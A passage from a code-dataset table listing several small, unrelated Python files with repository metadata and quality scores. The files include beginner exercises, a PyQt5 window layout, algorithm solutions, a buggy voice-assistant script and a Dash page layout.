hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6a04a0f526b072cb08a7b68cb313fe983569b9f | 185 | py | Python | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | 5 | 2020-05-18T06:54:52.000Z | 2021-05-29T23:17:41.000Z | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | null | null | null | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | 1 | 2020-05-17T22:47:49.000Z | 2020-05-17T22:47:49.000Z | a=1
def change_integer(a):
a = a+1
return a
print (change_integer(a))
print (a)
b=[1,2,3]
def change_list(b):
b[0]=b[0]+1
return b
print (change_list(b))
print (b)
| 10.277778 | 25 | 0.594595 | 38 | 185 | 2.789474 | 0.315789 | 0.037736 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056338 | 0.232432 | 185 | 17 | 26 | 10.882353 | 0.690141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6a4c2fc1d4f8c281ad941ff066addcc5b88b1da | 1,525 | py | Python | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | import speech_recognition as sr
import pyttsx3
import pywhatkit
import datatime
import wikipedia
import pyjokes
from googlesearch import search
listener = sr.Recognizer()
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setPropert('voice',voices[1].id)
def talk(text)
engine.say(text)
engine.runAndWait()
def take_commands():
try sr.Micophone() as source:
print('listeing')
voice = listener.listen(source)
command = listener.recognizer_google(voice)
command = command.lower()
if 'alexa' in command.replace('alexa','')
print(command)
except:
pass
return command
def run_owl():
command = take_command()
print(command)
if 'play' in command:
song = command.replace('play', '')
talk('playing' + song)
pywhatkit.playonyt(song)
elif 'time' in command:
time = data.datatime.now().strftime('%I:%M:%p')
talk('Current time is ' + time)
elif 'Who is ' in command
whatis = command.replace ('who is', '')
info = wikipedia.summary(whatis,1)
print(whatis)
talk(whatis)
elif 'what is' in comamnd
google = command.replace('what is' ,'')
infoG = search.summary(google,1)
print(google)
talk(google)
elif 'date' in command :
talk('soory I have a headache')
elif ' are you single' in command:
talk('I am in a relationship with wifi')
elif 'joke' in command:
talk(pyjokes.get_joke())
else:
talk('Please say the command again')
while True:
run_owl()
| 24.206349 | 51 | 0.655738 | 197 | 1,525 | 5.040609 | 0.451777 | 0.063444 | 0.039275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004209 | 0.220984 | 1,525 | 62 | 52 | 24.596774 | 0.83165 | 0 | 0 | 0.036364 | 0 | 0 | 0.134426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.018182 | 0.127273 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6a829207d8c15d0acfe6594c7b505a0ec551a5f | 7,470 | py | Python | View/old/MainWindow.py | logisticAKB/course-paper1 | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | 1 | 2021-03-13T17:05:02.000Z | 2021-03-13T17:05:02.000Z | View/old/MainWindow.py | logisticAKB/LandmarkRecognition | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | null | null | null | View/old/MainWindow.py | logisticAKB/LandmarkRecognition | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainWindow.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1147, 715)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.reportLayout = QtWidgets.QVBoxLayout()
self.reportLayout.setObjectName("reportLayout")
self.report = QtWidgets.QTableWidget(self.centralwidget)
self.report.setMinimumSize(QtCore.QSize(410, 0))
self.report.setMaximumSize(QtCore.QSize(410, 16777215))
self.report.setShowGrid(True)
self.report.setGridStyle(QtCore.Qt.SolidLine)
self.report.setRowCount(2)
self.report.setObjectName("report")
self.report.setColumnCount(2)
item = QtWidgets.QTableWidgetItem()
self.report.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.report.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.report.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.report.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.report.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.report.setItem(0, 1, item)
item = QtWidgets.QTableWidgetItem()
self.report.setItem(1, 0, item)
item = QtWidgets.QTableWidgetItem()
self.report.setItem(1, 1, item)
self.report.horizontalHeader().setVisible(True)
self.report.horizontalHeader().setDefaultSectionSize(204)
self.report.horizontalHeader().setMinimumSectionSize(0)
self.report.horizontalHeader().setStretchLastSection(False)
self.report.verticalHeader().setVisible(False)
self.report.verticalHeader().setCascadingSectionResizes(False)
self.report.verticalHeader().setDefaultSectionSize(22)
self.report.verticalHeader().setSortIndicatorShown(False)
self.report.verticalHeader().setStretchLastSection(False)
self.reportLayout.addWidget(self.report)
self.gridLayout.addLayout(self.reportLayout, 0, 0, 1, 1)
self.imageLayout = QtWidgets.QVBoxLayout()
self.imageLayout.setObjectName("imageLayout")
self.image = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.image.sizePolicy().hasHeightForWidth())
self.image.setSizePolicy(sizePolicy)
self.image.setText("")
self.image.setPixmap(QtGui.QPixmap("View/StartImage.jpg"))
self.image.setScaledContents(False)
self.image.setAlignment(QtCore.Qt.AlignCenter)
self.image.setObjectName("image")
self.imageLayout.addWidget(self.image)
self.buttonLayout = QtWidgets.QHBoxLayout()
self.buttonLayout.setObjectName("buttonLayout")
self.openImage = QtWidgets.QPushButton(self.centralwidget)
self.openImage.setObjectName("openImage")
self.buttonLayout.addWidget(self.openImage)
self.recognizeImage = QtWidgets.QPushButton(self.centralwidget)
self.recognizeImage.setObjectName("recognizeImage")
self.buttonLayout.addWidget(self.recognizeImage)
self.imageLayout.addLayout(self.buttonLayout)
self.gridLayout.addLayout(self.imageLayout, 0, 1, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1147, 18))
self.menubar.setObjectName("menubar")
self.file = QtWidgets.QMenu(self.menubar)
self.file.setObjectName("file")
self.help = QtWidgets.QMenu(self.menubar)
self.help.setObjectName("help")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.about = QtWidgets.QAction(MainWindow)
self.about.setObjectName("about")
self.open = QtWidgets.QAction(MainWindow)
self.open.setObjectName("open")
self.exit = QtWidgets.QAction(MainWindow)
self.exit.setObjectName("exit")
self.recognize = QtWidgets.QAction(MainWindow)
self.recognize.setObjectName("recognize")
self.exportToJson = QtWidgets.QAction(MainWindow)
self.exportToJson.setObjectName("exportToJson")
self.file.addAction(self.open)
self.file.addAction(self.recognize)
self.file.addAction(self.exportToJson)
self.file.addSeparator()
self.file.addAction(self.exit)
self.help.addAction(self.about)
self.menubar.addAction(self.file.menuAction())
self.menubar.addAction(self.help.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Установить метки"))
self.report.setSortingEnabled(True)
item = self.report.verticalHeaderItem(0)
item.setText(_translate("MainWindow", "0"))
item = self.report.verticalHeaderItem(1)
item.setText(_translate("MainWindow", "1"))
item = self.report.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Метка"))
item = self.report.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Уверенность, %"))
__sortingEnabled = self.report.isSortingEnabled()
self.report.setSortingEnabled(False)
item = self.report.item(0, 0)
item.setText(_translate("MainWindow", "Dog"))
item = self.report.item(0, 1)
item.setText(_translate("MainWindow", "99"))
item = self.report.item(1, 0)
item.setText(_translate("MainWindow", "Cat"))
item = self.report.item(1, 1)
item.setText(_translate("MainWindow", "1"))
self.report.setSortingEnabled(__sortingEnabled)
self.openImage.setText(_translate("MainWindow", "Открыть изображение"))
self.recognizeImage.setText(_translate("MainWindow", "Найти метки"))
self.file.setTitle(_translate("MainWindow", "Файл"))
self.help.setTitle(_translate("MainWindow", "Справка"))
self.about.setText(_translate("MainWindow", "О программе"))
self.open.setText(_translate("MainWindow", "Открыть изображение"))
self.exit.setText(_translate("MainWindow", "Выход"))
self.recognize.setText(_translate("MainWindow", "Найти метки"))
self.exportToJson.setText(_translate("MainWindow", "Экспорт в JSON"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 47.278481 | 108 | 0.693039 | 720 | 7,470 | 7.143056 | 0.231944 | 0.073887 | 0.075831 | 0.051332 | 0.215633 | 0.137468 | 0.075053 | 0.040443 | 0 | 0 | 0 | 0.013871 | 0.189291 | 7,470 | 157 | 109 | 47.579618 | 0.83537 | 0.024632 | 0 | 0.070423 | 1 | 0 | 0.070614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014085 | false | 0 | 0.014085 | 0 | 0.035211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b310ddd7552060444487d3b6bd14778c644bee | 2,012 | py | Python | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | '''
Gas Station
Asked in: Bloomberg, Google, DE Shaw, Amazon, Flipkart
Given two integer arrays A and B of size N.
There are N gas stations along a circular route, where the amount of gas at station i is A[i].
You have a car with an unlimited gas tank and it costs B[i] of gas to travel from station i
to its next station (i+1). You begin the journey with an empty tank at one of the gas stations.
Return the minimum starting gas station’s index if you can travel around the circuit once, otherwise return -1.
You can only travel in one direction. i to i+1, i+2, … n-1, 0, 1, 2.. Completing the circuit means starting at i and
ending up at i again.
Input Format
The first argument given is the integer array A.
The second argument given is the integer array B.
Output Format
Return the minimum starting gas station's index if you can travel around the circuit once, otherwise return -1.
For Example
Input 1:
A = [1, 2]
B = [2, 1]
Output 1:
1
Explanation 1:
If you start from index 0, you can fill in A[0] = 1 amount of gas. Now your tank has 1 unit of gas. But you need B[0] = 2 gas to travel to station 1.
If you start from index 1, you can fill in A[1] = 2 amount of gas. Now your tank has 2 units of gas. You need B[1] = 1 gas to get to station 0. So, you travel to station 0 and still have 1 unit of gas left over. You fill in A[0] = 1 unit of additional gas, making your current gas = 2. It costs you B[0] = 2 to get to station 1, which you do and complete the circuit.
Solution by interviewbit.com
'''
# @param A : tuple of integers
# @param B : tuple of integers
# @return an integer
def canCompleteCircuit(gas, cost):
sumo=0
fuel=0
start=0
for i in range(len(gas)):
sumo = sumo + (gas[i] - cost[i])
fuel = fuel + (gas[i] - cost[i])
if fuel<0:
fuel=0
start=i+1
if sumo>=0:
return (start%len(gas))
else:
return -1
if __name__ == "__main__":
data = [
] | 32.983607 | 376 | 0.66501 | 374 | 2,012 | 3.564171 | 0.320856 | 0.026257 | 0.024756 | 0.036009 | 0.275319 | 0.247562 | 0.172543 | 0.135034 | 0.135034 | 0.135034 | 0 | 0.031544 | 0.259443 | 2,012 | 61 | 377 | 32.983607 | 0.861074 | 0.807157 | 0 | 0.117647 | 0 | 0 | 0.021108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b4869088455d04e487300c06f2189b4e0eab83 | 2,020 | py | Python | api/tests/integration/tests/todo/load_utf8.py | epam/Indigo | cb6b0bb5568f414f387e1997ad64c7eedd92c04e | [
"Apache-2.0"
] | 204 | 2015-11-06T21:34:34.000Z | 2022-03-30T16:17:01.000Z | api/tests/integration/tests/todo/load_utf8.py | mongrzzzzzfr/Indigo | 07cb744a90ff17828f8c1185bcc2e78cb4e882b3 | [
"Apache-2.0"
] | 509 | 2015-11-05T13:54:43.000Z | 2022-03-30T22:15:30.000Z | api/tests/integration/tests/todo/load_utf8.py | mongrzzzzzfr/Indigo | 07cb744a90ff17828f8c1185bcc2e78cb4e882b3 | [
"Apache-2.0"
] | 89 | 2015-11-17T08:22:54.000Z | 2022-03-17T04:26:28.000Z | # coding=utf-8
import sys
sys.path.append('../../common')
from env_indigo import *
indigo = Indigo()
indigo.setOption("molfile-saving-skip-date", "1")
print("****** Load molfile with UTF-8 characters in Data S-group ********")
m = indigo.loadMoleculeFromFile(joinPathPy("molecules/sgroups_utf8.mol", __file__))
indigo.setOption("molfile-saving-mode", "2000")
res = m.molfile()
m = indigo.loadMolecule(res)
# TODO: Fails on IronPython 2.7.9:
# - M SED 1 single-value-бензол
# + M SED 1 single-value-������
if isIronPython():
from System.Text import Encoding
from System import Console
print(m.molfile())
print(res)
print(m.cml())
# reload(sys)
# sys.setdefaultencoding('utf-8')
# sys.stdout = codecs.getwriter('utf8')(sys.stdout)
# Console.WriteLine(m.molfile().encode("utf-8-sig"))
# print(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile().encode("utf-8-sig"))))
# Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(m.molfile().encode("utf-8"))))
# Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(res.encode("utf-8"))))
# Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(m.cml().encode("utf-8"))))
# m.saveMolfile("test.mol")
# with codecs.open(joinPathPy("test.mol", __file__), "r", "utf-8-sig") as temp:
# print(temp.read()[510:])
# with codecs.open('test', 'w', "utf-8") as f:
# f.write(m.molfile())
# Console.WriteLine(m.molfile())
# f.write(repr(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile()))))
# f.write(temp.read())
# f.write(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile().encode('utf-8'))))
# Console.Write(str(temp.read()).encode('utf-8'))
else:
if sys.version_info[0] < 3:
print(m.molfile().encode("utf-8"))
print(res.encode("utf-8"))
print(m.cml().encode("utf-8"))
else:
print(m.molfile())
print(res)
print(m.cml())
| 36.071429 | 102 | 0.631683 | 272 | 2,020 | 4.672794 | 0.3125 | 0.047207 | 0.078678 | 0.1369 | 0.426436 | 0.36192 | 0.343037 | 0.343037 | 0.239969 | 0.196696 | 0.00297 | 0.024434 | 0.169307 | 2,020 | 55 | 103 | 36.727273 | 0.72944 | 0.531683 | 0 | 0.32 | 0 | 0 | 0.180932 | 0.054171 | 0 | 0 | 0 | 0.018182 | 0 | 1 | 0 | false | 0 | 0.16 | 0 | 0.16 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcaad3bf3e2640d58347e127fd2a0d0a345cbdb7 | 1,477 | py | Python | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | 1 | 2020-06-26T21:49:14.000Z | 2020-06-26T21:49:14.000Z | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | 2 | 2020-03-31T11:11:04.000Z | 2021-12-13T20:38:48.000Z | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | null | null | null | import dash_core_components as dcc
import dash_html_components as html
import dash_table
import plotly
import plotly.graph_objs as go
layout = html.Div([
html.H2('Top Locations of Search Terms'),
html.P('Term searches may take several seconds. Please be patient.''),
html.P('Twitter users are not required to list a location in their profile; search results only reflect those who do.''),
html.A("Home", id='Home', href="http://127.0.0.1:5000/"),
html.Br(),
html.Br(),
dcc.Input(id='term_search', value='enter search term', type='text'),
html.Br(),
html.Br(),
dcc.Graph(id='live-graph',animate=False),
dcc.Interval(id='graph-update', interval=1*10000),
html.Br(),
html.Br(),
html.P('Partial records for up to 100 of the most recent tweets containing search term'),
dash_table.DataTable(
id='datatable-row-ids',
style_data={
'whiteSpace': 'normal',
'height': 'auto'
},
columns=[
{'name': i, 'id': i, 'deletable': True} for i in ['date_time', 'content', 'verified', 'lang',
'location',
'user', 'is_rt', 'textblob_sentiment',
'vader_sentiment']
# omit the id column
if i != 'id'
],
page_action='custom',
page_current= 0,
page_size= 10
),
html.Div(id='datatable-row-ids-container')
])
"""
layout = html.Div([
dash_table.DataTable(
id='tweet-table',
)])
"""
| 29.54 | 125 | 0.600542 | 199 | 1,477 | 4.371859 | 0.572864 | 0.041379 | 0.045977 | 0.041379 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020591 | 0.243737 | 1,477 | 49 | 126 | 30.142857 | 0.758281 | 0.012187 | 0 | 0.153846 | 0 | 0 | 0.386131 | 0.019708 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.128205 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcab580f13057192e08af639baf51b83a9fa44ae | 1,375 | py | Python | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | 3 | 2017-04-03T12:18:24.000Z | 2018-06-25T08:31:04.000Z | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | null | null | null | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | null | null | null | class Solution:
# @param num : a list of integer
# @return : a list of integer
def nextPermutation(self, num):
# write your code here
# Version 1
bp = -1
for i in range(len(num) - 1):
if (num[i] < num[i + 1]):
bp = i
if (bp == -1):
num.reverse()
return num
rest = num[bp:]
local_max = None
for i in rest:
if (i > rest[0] and (local_max is None or i < local_max)):
local_max = i
rest.pop(rest.index(local_max))
rest = sorted(rest)
return num[:bp] + [local_max] + rest
# Version 2
# i = len(num) - 1
# target_index = None
# second_index = None
# while (i > 0):
# if (num[i] > num[i - 1]):
# target_index = i - 1
# break
# i -= 1
# if (target_index is None):
# return sorted(num)
# i = len(num) - 1
# while (i > target_index):
# if (num[i] > num[target_index]):
# second_index = i
# break
# i -= 1
# temp = num[target_index]
# num[target_index] = num[second_index]
# num[second_index] = temp
# return num[:target_index] + [num[target_index]] + sorted(num[target_index + 1:])
| 30.555556 | 90 | 0.452364 | 170 | 1,375 | 3.541176 | 0.252941 | 0.182724 | 0.139535 | 0.044851 | 0.129568 | 0.129568 | 0 | 0 | 0 | 0 | 0 | 0.019036 | 0.426909 | 1,375 | 44 | 91 | 31.25 | 0.744924 | 0.44 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb5031213b77f76c4941cf91243b5919e3974dd | 406 | py | Python | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | def get_stdin():
raw_input()
list_1 = raw_input().split()
raw_input()
list_2 = raw_input().split()
return list_1, list_2
if __name__ == '__main__':
set_m, set_n = get_stdin()
set_m = set(set_m)
set_n = set(set_n)
result = []
result.extend(set_m.difference(set_n))
result.extend(set_n.difference(set_m))
print "\n".join(sorted(result, key=lambda x: int(x))) | 25.375 | 57 | 0.633005 | 66 | 406 | 3.469697 | 0.393939 | 0.087336 | 0.091703 | 0.069869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0125 | 0.211823 | 406 | 16 | 57 | 25.375 | 0.703125 | 0 | 0 | 0.142857 | 0 | 0 | 0.02457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb5c152d09a0048b13ae6ac86607f09ed887da3 | 661 | py | Python | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | # encoding: utf-8
# module Revit.References calls itself References
# from RevitNodes,Version=1.2.1.3083,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class RayBounce(object):
# no doc
@staticmethod
def ByOriginDirection(origin, direction, maxBounces, view):
"""
ByOriginDirection(origin: Point,direction: Vector,maxBounces: int,view: View3D) -> Dictionary[str,object]
Returns positions and elements hit by ray bounce from the specified origin
point and direction
"""
pass
__all__ = [
